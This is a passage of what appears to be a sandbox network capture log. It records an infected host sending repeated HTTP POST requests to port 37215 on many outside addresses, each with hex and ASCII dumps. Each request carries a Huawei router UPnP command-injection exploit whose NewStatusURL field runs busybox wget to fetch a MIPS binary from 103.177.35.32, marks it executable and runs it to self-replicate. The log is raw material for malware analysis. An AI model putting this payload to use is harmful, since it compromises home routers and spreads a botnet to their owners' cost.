                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1136192.168.2.2341926157.34.135.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529145956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1137192.168.2.234166641.199.184.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529237986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1138192.168.2.2355182172.205.194.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529246092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1139192.168.2.234005041.230.34.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529253960 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1140192.168.2.2360280197.11.222.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529301882 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1141192.168.2.2338762157.22.181.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529306889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1142192.168.2.2334410157.176.95.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529306889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1143192.168.2.2358340177.162.69.16537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529648066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1144192.168.2.2344190197.82.222.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529661894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1145192.168.2.236082441.71.146.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529668093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
